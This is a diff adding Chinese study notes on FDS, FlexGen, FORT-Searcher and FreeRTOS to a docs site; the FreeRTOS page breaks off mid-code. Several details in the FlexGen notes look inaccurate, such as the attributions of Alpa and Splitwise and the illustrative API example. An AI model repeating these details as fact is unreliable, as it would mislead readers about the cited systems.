优势:无单点瓶颈;读取速度 = 单盘速度 × 磁盘数; + 恢复速度 = 集群总带宽,而非单盘速度。 +``` + +--- + +## 七、FDS 的设计前提 + +FDS 的强大能力依赖于一个关键前提:**数据中心网络基础设施已经升级到了全二分带宽**。 + +这意味着: +- 集群内任意两台机器之间的通信都能达到满速 +- 网络不再是瓶颈,磁盘 I/O 才是 +- 这种网络架构在 2012 年的大型数据中心(如 Facebook、Google)已经可行 + +如果没有这个前提,FDS 的"让所有磁盘同时工作"的策略会导致网络拥塞,反而更慢。 + +--- + +## 八、这篇论文的贡献总结 + +1. **提出了"局部性无关"的存储设计理念**——打破"数据要就近存放"的传统思维 +2. **全集群数据条带化**——让每个 chunk 的读写都横跨整个集群 +3. **元数据分布式条带化**——消除了元数据服务的性能瓶颈 +4. **磁盘间直接高速恢复**——利用全带宽网络实现亚分钟级的 TB 级数据恢复 +5. **实际系统验证**——实现了 >2GB/s 的单进程吞吐,并创造了当时的排序世界纪录 + +--- + +## 九、思考题(等你回答后再继续) + +1. FDS 放弃了"数据局部性"优化,那么在什么场景下这种做法可能反而不如传统方案?(提示:考虑小文件的场景) + +--- + +*本文基于 OSDI 2012 论文 "Flat Datacenter Storage"(Nightingale, Elson, Fan, Hofmann, Howell, Suzue, Microsoft Research)整理。* diff --git a/src/content/docs/papers/flexgen-2023.md b/src/content/docs/papers/flexgen-2023.md new file mode 100644 index 000000000..3e13b41a5 --- /dev/null +++ b/src/content/docs/papers/flexgen-2023.md @@ -0,0 +1,252 @@ +--- +title: FlexGen — 把 175B 大模型塞进一张 16GB 显卡 +来源: https://arxiv.org/abs/2303.06865 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +## 是什么 + +FlexGen(**Flex**ible **Gen**eration Engine)是斯坦福、伯克利、CMU、耶鲁、Together AI、Yandex、ETH Zurich 等多机构合作 2023 年 3 月提出的**单卡高吞吐 LLM 推理系统**。它能在一张 16GB 消费级 GPU(NVIDIA T4)上运行 OPT-30B 甚至 OPT-175B 模型。 + +日常类比:大模型推理就像一场宴会——GPU 的显存是餐桌,模型权重、中间计算结果、KV 缓存是满桌菜。以前只有大桌子(多张 A100)才能放下;FlexGen 的思路是**用 CPU 内存和 SSD 当餐边柜**,做菜时只把当前要用的菜放到桌上,做完立刻收回去,再取下一道。通过智能调度,餐桌虽小说能请很多桌客人同时吃饭(大 batch),总吞吐量反而更高。 + +## 为什么重要 + +- 首次让 **OPT-175B 在单卡 T4 上达到 1 token/s** 级别吞吐——之前几乎不可能 +- 面向**批处理优先**场景(benchmark、数据抽取、表单处理),延迟可以慢,但吞吐必须高 +- 通过线性规划自动搜索最优张量放置策略,用户只需给约束条件 +- 权重 + KV 缓存压缩到 4-bit,几乎不掉精度 +- 让企业用 **$0.5/小时 的 T4 替代 $5/小时 的 A100** 做离线推理——成本降 10 倍 + +## 核心要点 + +FlexGen 的核心思想可以拆成四块: + +### 1. 三级存储分层:GPU ↔ CPU ↔ Disk + +模型张量(权重、激活、KV 缓存)不再只驻留 GPU,而是可以**分布在三个存储层**: + +- **GPU**:当前层计算需要活跃的数据 +- **CPU 内存**:暂存暂时不用的权重和缓存(比 GPU 大得多,16GB GPU vs 200GB+ CPU 内存) +- **Disk(SSD)**:存放几乎不访问的权重,按需读取 + +关键问题:**哪些放哪层?** FlexGen 用线性规划自动求解最优放置方案,输入是 GPU/CPU/磁盘容量约束,输出是每个张量的存储位置。 + +### 2. 块级调度(Block Scheduling) + +这是 FlexGen 相比之前系统(如 Alpa、DeepSpeed)的**核心创新**。 + +之前的 offloading 系统用**逐行调度**——算完一层再把权重从 CPU 搬运下来,计算完又搬回去。大量时间浪费在 I/O 上。 + +FlexGen 改用**块级调度**——把输入 batch 分成多个 block,每个 block 独立计算: + +``` +Block 1: 搬运所需权重 → 计算 → 搬运回 CPU/Disk +Block 2: 搬运所需权重 → 计算 → 搬运回 CPU/Disk +... +``` + +每个 block 内部 I/O 与计算**部分重叠**(CPU→GPU 搬运时 GPU 已经在算上一个 block 的尾部),减少空闲等待。效果:I/O 效率大幅提升。 + +### 3. 4-bit 量化压缩 + +FlexGen 对两部分做 4-bit 压缩: + +- **模型权重(weights)**:FP16 → INT4,显存占用降 4x +- **KV 缓存(attention cache)**:FP16 → INT4,显存占用降 4x + +压缩不是简单截断,而是做**逐通道缩放(per-channel scaling)**:找到每个通道中激活值最大的绝对值作为 scale,量化时用 scale 做归一化,反量化时再乘回去。这比逐权重量化更准,且硬件友好。 + +论文实验显示:压缩后精度**几乎无损失**(<1% 困惑度增长)。 + +### 4. 延迟-吞吐的主动权衡 + +FlexGen 明确放弃"低延迟"目标,转向**最大化吞吐**。这意味着: + +- 接受较高的单次请求延迟 +- 通过**超大有效 batch size** 摊薄 I/O 开销 +- OPT-30B 上可达 **batch size = 144**(CPU offloading),OPT-175B 上可达 **256** + +类比:餐厅不追求每桌 5 分钟上菜(低延迟),而是追求一天能接待 500 桌(高吞吐)。 + +## 实践案例 + +### 案例 1:安装和运行 OPT-1.3B(单卡即可,无需 offloading) + +```bash +pip install flexllmgen + +# OPT-1.3B 只有约 2.6GB 权重,直接塞进 16GB GPU +python3 -m flexllmgen.flex_opt --model facebook/opt-1.3b +``` + +输出会显示 OPT-1.3B 生成的文本和 benchmark 结果。这一步不触发 offloading,因为模型太小。 + +### 案例 2:运行 OPT-30B(需要 CPU offloading) + +```bash +# OPT-30B 权重约 60GB,远超 16GB GPU +# --percent 六个参数分别控制: +# [权重层0在GPU%, 权重层1在CPU%, 权重在Disk%, +# KV缓存在GPU%, KV缓存在CPU%, KV缓存在Disk%] +python3 -m flexllmgen.flex_opt \ + --model facebook/opt-30b \ + --percent 0 100 0 0 100 0 + +# 解释:权重 100% 放 CPU,KV 缓存 100% 放 CPU +# 计算时按需从 CPU 搬到 GPU,算完收回 +# 在 T4 + 208GB RAM 上达到 7.32 token/s(batch=144) +``` + +### 案例 3:运行 OPT-175B(需要磁盘 offloading) + +```bash +# OPT-175B 权重约 350GB,CPU 内存也不够 +# 权重全部放 SSD,KV 缓存放 CPU +python3 -m flexllmgen.flex_opt \ + --model facebook/opt-175b \ + --percent 0 0 100 0 100 0 \ + --offload-dir /path/to/ssd + +# 在 T4 + 1.5TB SSD 上达到 0.69 token/s(batch=256) +# 加上 --compress-weight 可达 1.12 token/s +``` + +### 案例 4:通过 API 批量推理 + +```python +from flexllmgen import FlexLLMGen + +model = FlexLLMGen( + model_name="facebook/opt-30b", + percent=[0, 100, 0, 0, 100, 0], # offloading 策略 + gpu_batch_size=48, # 每个 GPU 的 batch + num_gpu_batches=3, # 总共 144 个请求 +) + +# 批量生成:一次输入 144 条文本 +prompts = [ + "The meaning of life is", + "Python is a", + # ... 142 more +] + +outputs = model.generate(prompts, max_new_tokens=32, temperature=0.7) + +for prompt, out in zip(prompts, outputs): + print(f"[{prompt}] -> {out}") +``` + +### 案例 5:集成 HELM benchmark + +```bash +pip install crfm-helm + +# 在 T4 上跑 MMLU 抽象代数子场景 +python3 -m flexllmgen.apps.helm_run \ + --description mmlu:model=text,subject=abstract_algebra \ + --pad-to-seq-len 512 \ + --model facebook/opt-30b \ + --percent 20 80 0 100 0 100 \ + --gpu-batch-size 48 \ + --num-gpu-batches 3 \ + --max-eval-instance 100 +``` + +### 案例 6:`--percent` 参数的六种组合速查 + +``` +位置: [权重_GPU, 权重_CPU, 权重_Disk, KV_GPU, KV_CPU, KV_Disk] + +全部GPU : 100 0 0 100 0 0 → 模型必须完全塞进 GPU,最快但受限 +全部CPU : 0 100 0 0 100 0 → 通用策略,大多数场景够用 +全磁盘 : 0 0 100 0 100 0 → 极端受限,175B 级别才需要 +混合 : 20 80 0 100 0 0 → 热点权重留 GPU,其余上 CPU +... +约束: 权重前三项之和=100,KV 三项之和=100 +``` + +## 核心数据对比 + +在 T4 (16GB) + 208GB DRAM + 1.5TB SSD 上,OPT-175B 的吞吐对比: + +| 系统 | 吞吐 (token/s) | 有效 batch | 备注 | +|------|:-:|:-:|------| +| HuggingFace Accelerate (disk offload) | 0.01 | 2 | 几乎不可用 | +| DeepSpeed ZeRO-Inference (disk) | 0.01 | 1 | 同上 | +| Petals (distributed) | 0.08 | 2 | 分布式,依赖多机器 | +| **FlexGen** | **0.69** | **256** | **单卡,全部放磁盘** | +| **FlexGen + 压缩** | **1.12** | **144** | **4-bit 权重 + KV** | + +OPT-30B 上 FlexGen 达到 **7.32 token/s(batch=144)**,加压缩到 **8.38 token/s(batch=512)**。 + +## 踩过的坑 + +1. **单卡 offloading 对小 batch 很慢**:FlexGen 为**大 batch 批处理**优化,单次请求延迟可能比 A100 高数十倍。如果你的场景是一次聊一句,别用它。 + +2. **`--percent` 需要调**:没有自动优化器(论文预告了但没发布),需要手动尝试几组策略。经验法则:模型 > CPU 容量时,权重往 Disk 放;GPU 能塞下当前层就留 GPU。 + +3. **SSD 必须是 NVMe**:机械硬盘的 I/O 太慢,块级调度优势荡然无存。论文实验用的 1.5TB SSD 是 NVMe 级别(~2GB/s 读)。 + +4. **压缩不是免费的**:INT4 量化引入的计算开销虽然小,但在 GPU 瓶颈时(如 OPT-6.7B 全放 GPU)反而可能比 FP16 慢。压缩主要在 offloading 场景获益。 + +5. **CPU 内存也要够**:`--percent 0 100 0` 把全部权重放 CPU 时,OPT-30B 需要约 90GB CPU 内存。小内存机器(如 64GB)需要把更多权重放 Disk。 + +6. **分布式扩展有限**:论文展示了多机 pipeline parallelism 的扩展,但需要各机 GPU 间有高速网络。同机多卡不如直接用 DeepSpeed/FSDP。 + +## 适用 vs 不适用场景 + +**适用**: + +- 离线批处理任务:benchmark(HELM/MMLU)、数据抽取、表单处理、日志分析 +- 只有单卡消费级 GPU,但有大模型推理需求 +- 模型太大(30B/175B),多卡 A100 太贵或不方便申请 +- 对延迟不敏感(可以跑几小时),追求低成本高吞吐 + +**不适用**: + +- 交互式聊天应用(低延迟要求)——用 vLLM / TensorRT-LLM +- 小模型(<3B)——直接放 GPU 不需要 offloading +- 需要极低延迟 + 高吞吐的场景——FlexGen 的 trade-off 偏吞吐 +- 没有 NVMe SSD 的环境——磁盘 offloading 优势全无 + +## 历史小故事(可跳过) + +- **2022.08**:Stanford 发布 Alpa,首次用自动并行 + offloading 在 CPU 集群上跑 OPT-175B,但需要 48 台机器 +- **2022 末**:Petals 用分布式推理(多 GPU 共享权重),每卡只拿一部分权重,但单卡延迟极高 +- **2023.03**:FlexGen 论文 arXiv 上线,核心洞察——**批处理场景下 offloading 的 I/O 效率被严重低估** +- **2023.06**:论文修订版,增加 4-bit 量化实验,OPT-175B 吞吐翻倍 +- **2023–2024**:vLLM 崛起,专注 GPU 内 PagedAttention + 高吞吐,成为交互式推理事实标准。FlexGen 走不同路线——offloading + 压缩,面向**无 GPU 或 GPU 严重不足**的场景 + +## 学到什么 + +1. **offloading 不是"慢",而是"没用好"**——逐行调度 I/O 浪费严重,块级调度的重叠才是关键 +2. **延迟和吞吐是两个不同的优化目标**——FlexGen 放弃前者全力追求后者,这个取舍在批处理场景下非常明智 +3. **线性规划不是摆设**——自动求解张量放置策略,比人工经验更优,也更适应不同硬件配置 +4. **4-bit 压缩已经成熟到"无感"**——权重和 KV 缓存一起压缩,精度几乎无损,性价比极高 +5. **单卡不是上限**——FlexGen 可以扩展到多机 pipeline parallelism,offloading 和分布式可以叠加 + +## 延伸阅读 + +- 论文 PDF:[FlexGen arXiv 2303.06865](https://arxiv.org/abs/2303.06865) +- 官方代码:[FMInference/FlexLLMGen](https://github.com/FMInference/FlexLLMGen)(已归档,v2 为最终版) +- HELM 评测框架:[stanford-crfm/helm](https://github.com/stanford-crfm/helm) +- [[vllm]] —— 同期对手,专注 GPU 内 PagedAttention 高吞吐,面向交互式场景 +- [[awq-2023]] —— 4-bit 量化方案,FlexGen 的压缩思路与之互补 +- [[splitwise-2023]] —— 另一条 offloading 路线,按层自动划分 GPU/CPU + +## 关联 + +- [[vllm]] —— GPU 内高吞吐推理;FlexGen 走 offloading 路线,两者面向不同硬件条件 +- [[awq-2023]] —— 4-bit 权重量化;FlexGen 也用了类似的 per-channel INT4 压缩 +- [[splitwise-2023]] —— 自动 GPU/CPU 分层,FlexGen 的线性规划前置工作 +- [[efficient-compile-2011]] —— 古典编译优化思想:通过分块(tiling)提高内存复用 +- [[triton-2019]] —— 自动化张量放置/编译的探索者,FlexGen 的 LP 优化与之精神相通 + +## 反向链接 + + + diff --git a/src/content/docs/papers/fort-searcher.md b/src/content/docs/papers/fort-searcher.md new file mode 100644 index 000000000..df490d86d --- /dev/null +++ b/src/content/docs/papers/fort-searcher.md @@ -0,0 +1,337 @@ +--- +title: FORT-Searcher +来源: https://arxiv.org/abs/2606.12087 +日期: 2026-06-13 +分类: 机器学习 +子分类: 搜索智能体 +provenance: pipeline-v3 +--- + +# FORT-Searcher: Synthesizing Shortcut-Resistant Search Tasks for Training Deep Search Agents + +## 一句话概括 + +这篇论文说:现有的深度搜索训练数据看起来很难,但其实模型可以走"近道"快速找到答案,所以训练效果不好。FORT 提出了一套方法,专门制造那些"没有近道可走"的题目,用来训练更强的搜索智能体。 + +## 日常类比:寻宝游戏 + +想象你在组织一个寻宝游戏。你设计了 5 条线索,每条线索指向下一个地点,最终到达宝藏。但问题是——有聪明的玩家根本不按顺序找,他们直接问主持人:"宝藏在哪?"或者在第一条线索还没看完时就猜到了答案。 + +这样的寻宝游戏看起来复杂(5 条线索嘛),但实际上玩家不需要走完整个流程就能赢。 + +FORT 做的事情就是:重新设计寻宝游戏,确保玩家**必须**按照完整的线索链走,没法跳步、没法猜、没法靠"我知道答案"来作弊。 + +## 背景:什么是深度搜索智能体? + +传统的问答系统是这样的:你问一个问题,系统去数据库里找答案,给你。比如你问"张三的老师是谁?",系统查一下关系表就告诉你。 + +深度搜索智能体(Deep Search Agent)不一样。它面对的是一个开放世界的问题,比如: + +> "哪位植物学家描述的蕨类物种,其种加词来源于一条山脉名称,且他的博士导师还指导过一位以发现某种兰花闻名的植物学家?" + +这种问题,你没法用一个简单的数据库查询回答。智能体需要: + +1. 理解问题中的多个约束条件 +2. 在互联网上反复搜索,逐步收集证据 +3. 把分散在不同来源的信息拼在一起 +4. 最后给出答案 + +这就是"深度搜索"——需要多轮、多步骤的证据收集。 + +## 核心问题:结构复杂 ≠ 真的难 + +现有的训练数据合成方法,通常通过增加"结构复杂度"来提升题目难度,比如: + +- 增加搜索的"跳跃次数"(hop count) +- 构建更复杂的知识图谱 +- 增加证据的分散程度 + +但论文指出:**结构上的复杂,不等于实际搜索时的困难。** + +原因很简单:即使题目设计了 10 条线索,如果其中某一条线索本身就足够锁定答案,或者几条线索出现在同一个网页上,模型就可以走"近道",不需要走完所有步骤。 + +论文把这种"近道"称为 **Shortcut(捷径)**。 + +## 四大捷径模式 + +这是论文最核心的贡献之一。作者形式化地识别了四种捷径: + +### 1. 单一线索选择性 (Single-clue Selectivity) + +一条线索就把候选答案缩小到只剩一两个。 + +**例子:** + +> 问题:「哪部电影由导演 A 执导,主演是演员 B,在 2020 年上映,票房超过 10 亿美元?」 + +如果"由导演 A 执导"这一条就已经能唯一确定电影了,那后面三条线索就形同虚设。模型搜一次就知道答案。 + +### 2. 证据共覆盖 (Evidence Co-coverage) + +多条线索的答案出现在同一个网页上。 + +**例子:** + +> 你构造了一道题,需要验证"某人出生于某城市"和"某人在某公司工作"两条线索。结果维基百科一页就同时说了这两件事。模型只需要搜一次 Wikipedia,两条线索都验证了。 + +### 3. 暴露常数 (Exposed Constants) + +题目中直接给出了本该通过搜索才能发现的精确信息。 + +**例子:** + +> 问题:「已知某人的身份证号前六位是 110101,他毕业于哪所大学?」 + +身份证号前六位根本不该出现在题目里——这应该是模型需要通过搜索才能发现的中间信息。直接暴露它,后面的搜索步骤就被跳过了。 + +### 4. 先验知识绑定 (Prior-knowledge Binding) + +模型凭借预训练时学到的知识,在搜索之前就猜出了答案。 + +**例子:** + +> 问题:「2024 年诺贝尔物理学奖得主是谁?」 + +如果模型在训练数据中见过这个问题,它可能根本不需要搜索就直接回答。这对训练"搜索能力"毫无帮助。 + +## FORT 框架:如何制造"没有近道"的题目 + +FORT(Framework of Shortcut-Resistant Training-Data Synthesis)针对上述四种捷径,在每个环节做了控制: + +### 实体选择阶段 + +- 选冷门(long-tail)实体作为问题的核心,降低模型"恰好知道答案"的概率 +- 避免选那些在训练数据中高频出现的知名人物/事件 + +### 证据图构建阶段 + +- 从多种异构来源收集事实,降低"共覆盖"风险 +- 构建衍生事实(derived facts),而不是直接从原文抄 +- 选择单独看很弱、但组合起来才有辨识度的事实 + +### 问题表述阶段 + +- 隐藏中间实体的精确名称,不让模型直接拿来搜索 +- 将精确数值模糊化为真实范围或类别描述 + +### 对抗性优化阶段 + +- 用一个强大的搜索智能体去"攻击"每道草稿题目 +- 如果模型能走捷径或题目有歧义,就修复或删除 + +## 代码示例 + +### 示例一:衡量一个问题的"捷径程度" + +下面是一个简化的伪代码,展示如何检测四种捷径: + +```python +def detect_shortcuts(question, constraints, retrieval_results): + """ + 检测一道题目是否存在四种捷径模式。 + + Args: + question: 问题的文本 + constraints: 问题中包含的约束条件列表,如 ["出生于北京", "毕业于清华"] + retrieval_results: 搜索结果,每个元素包含 {query, snippets, urls} + + Returns: + shortcuts: 检测到的捷径类型列表 + """ + shortcuts = [] + + # 1. 检测单一线索选择性 + # 逐个移除约束,看剩下的约束是否仍能唯一确定答案 + for i, constraint in enumerate(constraints): + remaining = [c for j, c in enumerate(constraints) if j != i] + candidate_pool = filter_candidates(remaining) + if len(candidate_pool) <= 2: + shortcuts.append({ + "type": "single_clue_selectivity", + "clue": constraint, + "remaining_candidates": len(candidate_pool) + }) + + # 2. 检测证据共覆盖 + # 检查是否有单个搜索结果同时覆盖了多条线索 + for url, results in group_by_url(retrieval_results): + covered_constraints = check_covered_constraints(results) + if len(covered_constraints) >= 2: + shortcuts.append({ + "type": "evidence_co_coverage", + "url": url, + "covered_constraints": covered_constraints + }) + + # 3. 检测暴露常数 + # 检查题目中是否包含可直接用于搜索的精确信息 + exposed = extract_constants_from_question(question) + if exposed: + shortcuts.append({ + "type": "exposed_constants", + "constants": exposed + }) + + # 4. 检测先验知识绑定 + # 检查模型是否在获取证据之前就提到了答案 + if model_answer_time < first_evidence_time: + shortcuts.append({ + "type": "prior_knowledge_binding" + }) + + return shortcuts +``` + +### 示例二:FORT 的数据合成流程 + +```python +class FORTDataSynthesizer: + """ + FORT 数据合成器的主流程。 + + 核心思路: + 1. 选一个冷门实体作为答案 + 2. 构建证据图,确保线索分散 + 3. 生成问题,模糊化精确值 + 4. 用对抗性搜索验证没有捷径 + """ + + def __init__(self, retriever, llm): + self.retriever = retriever + self.llm = llm + + def synthesize(self, seed_entity): + # Step 1: 实体选择 - 选冷门的 + entity = self.select_long_tail_entity(seed_entity) + + # Step 2: 构建证据图 + graph = self.build_evidence_graph(entity) + + # 从异构来源收集事实,降低共覆盖 + facts = [] + for source in ["wikipedia", "academic_paper", "news", "government_record"]: + source_facts = self.collect_facts(entity, source) + facts.extend(source_facts) + + # 构建衍生事实(不直接从原文复制) + derived_facts = self.construct_derived_facts(facts) + + # Step 3: 生成问题 + question = self.formulate_question( + constraints=derived_facts, + fuzz_constants=True # 将精确值模糊化 + ) + + # Step 4: 对抗性验证 + shortcuts = self.adversarial_check(question, entity) + if shortcuts: + # 有捷径,修复或丢弃 + return self.refine_or_discard(question, entity, shortcuts) + + # 生成完整的搜索轨迹 + trajectory = self.generate_trajectory(question, entity) + + return { + "question": question, + "answer": entity, + "trajectory": trajectory, + "constraints": derived_facts + } + + def select_long_tail_entity(self, seed): + """选择长尾实体,降低先验知识绑定的概率""" + candidates = self.find_related_entities(seed) + # 按训练数据中出现频率排序,选最冷门的 + scored = [(e, self.count_training_frequency(e)) for e in candidates] + scored.sort(key=lambda x: x[1]) + return scored[0][0] # 选出现频率最低的 + + def construct_derived_facts(self, raw_facts): + """ + 构建衍生事实。 + 原始事实可能直接出现在某个网页上, + 衍生事实需要模型综合多个来源才能得出。 + """ + derived = [] + for fact in raw_facts: + # 变换表达方式,避免精确匹配 + paraphrased = self.paraphrase(fact) + # 或者从多个事实中推理出新事实 + combined = self.combine_facts(fact, random.choice(raw_facts)) + derived.append(combined or paraphrased) + return derived + + def formulate_question(self, constraints, fuzz_constants=False): + """ + 将约束条件转化为自然语言问题。 + fuzz_constants=True 时,会将精确数值替换为范围描述。 + """ + question_parts = [] + for c in constraints: + if fuzz_constants and is_numeric(c): + # 把"出生于1985年"变成"出生于1980年代中期" + c = self.fuzz_to_range(c) + question_parts.append(c) + + question = self.llm.generate( + prompt=f"请用自然语言描述以下约束条件,使它们构成一个有挑战性的问题:{'; '.join(question_parts)}" + ) + return question + + def adversarial_check(self, question, answer): + """ + 用一个强搜索智能体去尝试解题, + 如果它走了捷径(搜索次数太少),就标记为有问题。 + """ + trajectory = self.run_search_agent(question, max_turns=50) + shortcuts = detect_shortcuts(question, trajectory.constraints, trajectory.results) + + # 额外检查:答案是否在搜索早期就出现了? + answer_hit_time = self.get_answer_hit_time(trajectory) + total_cost = len(trajectory.queries) + if answer_hit_time < total_cost * 0.2: + shortcuts.append({ + "type": "early_exposure", + "hit_ratio": answer_hit_time / total_cost + }) + + return shortcuts +``` + +## 关键指标:怎么判断一道题真的难? + +论文提出了三个可观测的指标,用来衡量训练数据的真实难度: + +| 指标 | 符号 | 含义 | 好的数据集应该 | +|------|------|------|----------------| +| 求解成本 | Ω̂ | 模型平均需要多少次搜索 | 越高越好 | +| 答案命中时间 | T̄_hit | 答案最早在第几步被找到 | 越晚越好 | +| 先验捷径率 | p̂_prior | 模型在搜索前就猜出答案的比例 | 越低越好 | + +如果一个数据集的求解成本很高(搜了很多次),但答案命中时间很早(答案早就出现了),说明模型大部分时间在做无用功——验证已经知道的东西。这不是好的训练信号。 + +好的训练数据应该让模型**不得不**搜索很久才能看到答案。 + +## 实验结果 + +FORT-Searcher 只在 BrowseComp、BrowseComp-ZH 等基准上做了实验。关键结果: + +- 只用监督微调(SFT),不做强化的 FORT-Searcher 在同等规模的开源搜索智能体中表现最好 +- FORT 生成的数据确实诱导了更长的"答案出现前的搜索" +- 相比现有开源数据集,FORT 数据中的四种捷径模式都显著减少 + +## 总结 + +这篇论文的核心洞察可以用一句话概括: + +> **题目看起来难,不代表搜索过程真的难。** + +现有方法只管"结构设计",不管"实际搜索路径"。FORT 的价值在于引入了"捷径感知"的视角,系统地识别并封堵了四条近道。这就像是在设计考试时,不仅要看知识点覆盖广不广,还要检查学生能不能靠猜题、靠背原题、靠老师漏出的答案来拿高分。 + +对于正在学习搜索智能体的同学来说,这篇论文提醒我们:训练数据的质量不在于题目的数量或结构的复杂度,而在于它能否真正迫使模型执行预期的搜索过程。 + +## 延伸思考 + +1. FORT 的方法是否可以迁移到其他领域?比如代码生成、数学推理?这些领域同样存在"捷径"问题。 +2. 对抗性验证阶段需要一个"强搜索智能体",如果这个智能体本身不够强,会不会漏掉一些隐蔽的捷径? +3. FORT 只用了 SFT,没有用强化学习。结合 RL 会不会有更好的效果?论文提到这是未来工作方向。 diff --git a/src/content/docs/papers/freertos-overview.md b/src/content/docs/papers/freertos-overview.md new file mode 100644 index 000000000..8189555c5 --- /dev/null +++ b/src/content/docs/papers/freertos-overview.md @@ -0,0 +1,280 @@ +--- +title: FreeRTOS Reference Manual — 嵌入式实时内核零基础导读 +来源: https://www.freertos.org/Documentation/RTOS_book.html +日期: 2026-06-13 +子分类: 嵌入式与 IoT +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象一家**只有一位厨师的快餐厨房**: + +- **单片机**就是这位厨师——同一时刻只能炒一道菜。 +- 厨房同时要处理:读温度传感器、响应按键、通过 Wi-Fi 上报数据、驱动电机。每件事都像一道「菜」,不能永远占着灶台。 +- **FreeRTOS** 就是墙上的**排班表 + 传菜窗口**:谁该先炒(优先级)、炒完让出灶台(抢占调度)、菜好了放窗口里等取(队列)、同一口锅不能两人同时用(互斥量)。 + +没有 RTOS 时,程序员用 `while(1)` 里塞满 `if` 和标志位,逻辑一多就变成「意大利面条代码」;任务一多,某个循环卡 200ms,按键就「失灵」。FreeRTOS 把「多件事并行发生」拆成**可命名的任务**,由内核在 Tick 中断驱动下切换,让高优先级、硬实时工作先跑,低优先级后台活慢慢干。 + +官方文档入口 [RTOS_book.html](https://www.freertos.org/Documentation/RTOS_book.html) 指向两类资料: + +| 资料 | 定位 | 适合谁 | +|------|------|--------| +| *Mastering the FreeRTOS Real Time Kernel*(GitHub / PDF) | 手把手教程,带示例工程 | 第一次上手、要跑通 Demo | +| *FreeRTOS Reference Manual*(PDF,如 V10.0.0) | API 按字母序的查阅手册 | 已会概念、写代码时查参数 | + +本篇笔记以 **Reference Manual + Kernel Book 第 4–8 章** 为主线,把零基础读者带到「能读懂 API 页、能写最小多任务程序」。 + +## 这篇文档在说什么 + +| 维度 | 内容 | +|------|------| +| 项目 | FreeRTOS™ — Amazon 维护的开源实时内核 | +| 许可 | MIT(内核);部分组件另有许可 | +| 典型平台 | ARM Cortex-M/R/A、RISC-V、ESP32、STM32、NXP 等 MCU | +| 文档结构 | 任务/调度 API、队列 API、信号量 API、软件定时器 API、事件组 API | +| 配套书 | Richard Barry,《Mastering the FreeRTOS Real Time Kernel》 | + +Reference Manual 不是「从原理讲到实现」的论文,而是**内核对外契约的索引**:每个 `xTaskCreate`、`xQueueSend` 的参数、返回值、阻塞行为、ISR 安全变体都写清楚。要理解**为什么**这样设计,需要配合 Kernel Book 里的状态机图和时序说明。 + +## 为什么值得学 + +| 场景 | FreeRTOS 提供的价值 | +|------|---------------------| +| 传感器 + 通信 + UI 三合一固件 | 任务隔离,模块边界清晰 | +| 电机控制、安全联锁 | 抢占式调度保证高优先级控制环 | +| 低功耗可穿戴 | Tickless 空闲、任务阻塞时不占 CPU | +| 从 Arduino `loop()` 迁移 | 可渐进引入,先 2 个任务再扩展 | +| 面试「嵌入式 OS」 | 任务/队列/信号量/优先级反转是高频题 | + +全球出货量极大的 MCU 生态(STM32 HAL、ESP-IDF、AWS IoT 参考设计)默认或推荐 FreeRTOS,读懂 Reference Manual 等于拿到了这些栈的**公共子集**。 + +## 核心概念一:任务(Task)与调度 + +在 FreeRTOS 里,**任务**是唯一可被调度的执行单元,实现为带无限循环的 C 函数: + +```c +void vSensorTask( void * pvParameters ) +{ + (void) pvParameters; + + for( ;; ) + { + read_sensors(); + vTaskDelay( pdMS_TO_TICKS( 100 ) ); /* 阻塞 100ms,让出 CPU */ + } +} +``` + +要点: + +- 任务函数**不能 return**;不再需要时调用 `vTaskDelete( NULL )` 删除自身。 +- `xTaskCreate()` 创建任务时需指定:函数指针、任务名、栈深度(以 `StackType_t` 字数计)、参数、优先级、句柄。 +- 单核上任意时刻**最多一个任务处于 Running**;其余在 Ready、Blocked 或 Suspended。 + +### 任务状态(简化) + +``` + ┌─────────────┐ + 就绪 ─────►│ Running │◄───── 抢占 / 恢复 + └──────┬──────┘ + │ vTaskDelay / 等队列 / 等信号量 + ▼ + ┌─────────────┐ + │ Blocked │ (不占 CPU,等「同步事件」) + └─────────────┘ +``` + +**Tick 中断**周期性唤醒调度器:`configTICK_RATE_HZ`(常见 1000,即 1ms 一拍)决定 `pdMS_TO_TICKS()` 的精度。 + +### 调度策略(`FreeRTOSConfig.h`) + +| 模式 | 行为 | +|------|------| +| 抢占 + 时间片(默认常见) | 最高优先级 Ready 任务运行;同优先级轮转 | +| 抢占、无时间片 | 同优先级任务需主动让出或阻塞才切换 | +| 协作式 | 任务必须 `taskYIELD()`,无抢占 | + +调度器只认**数字优先级**:数越大越优先(与部分 POSIX 系统相反,读文档时注意端口说明)。 + +## 核心概念二:队列(Queue)— 传菜窗口 + +队列是**线程安全的 FIFO**,数据**按值拷贝**进队列(不是只传指针——传指针时调用方要保证生命周期)。空队列读、满队列写可指定 **block time**,超时前任务进 Blocked,**不空转烧 CPU**。 + +典型模式:中断里 `xQueueSendFromISR()`,任务里 `xQueueReceive()` 处理: + +```c +QueueHandle_t xPacketQueue; + +void vNetworkTask( void * pvParameters ) +{ + uint8_t ucBuffer[ 64 ]; + + for( ;; ) + { + if( xQueueReceive( xPacketQueue, ucBuffer, portMAX_DELAY ) == pdPASS ) + { + process_packet( ucBuffer ); + } + } +} + +void vUartISR( void ) +{ + BaseType_t xHigherPriorityTaskWoken = pdFALSE; + uint8_t ucByte; + + ucByte = UART_READ_REG; + xQueueSendFromISR( xPacketQueue, &ucByte, &xHigherPriorityTaskWoken ); + portYIELD_FROM_ISR( xHigherPriorityTaskWoken ); +} +``` + +Reference Manual 第 3 章列出 `xQueueSend`、`xQueueSendToBack`、`xQueueSendToFront`、`xQueueOverwrite`(长度 1 时)及全部 `FromISR` 变体。记住:**在 ISR 里只能用 `FromISR` 后缀 API**,且部分 API 会要求 `portYIELD_FROM_ISR` 触发立即切换。 + +## 核心概念三:信号量与互斥量 + +| 类型 | 用途 | 类比 | +|------|------|------| +| 二进制信号量 | 任务↔中断、任务↔任务**同步**(「事件发生」) | 门铃响一声 | +| 计数信号量 | 资源池 N 个槽位 | 停车场剩余车位显示 | +| 互斥量(Mutex) | **互斥访问**共享资源,带优先级继承 | 厕所门锁,外面排队 | + +**互斥量 vs 二进制信号量**:互斥量有「持有者」概念,且启用**优先级继承**——高优先级任务等低优先级任务手里的 mutex 时,临时抬高持有者优先级,减轻**优先级反转**。二进制信号量没有继承,不适合长期占资源的互斥场景。 + +```c +SemaphoreHandle_t xSpiMutex; + +void vHighPriorityTask( void * pvParameters ) +{ + for( ;; ) + { + if( xSemaphoreTake( xSpiMutex, portMAX_DELAY ) == pdTRUE ) + { + spi_transfer( 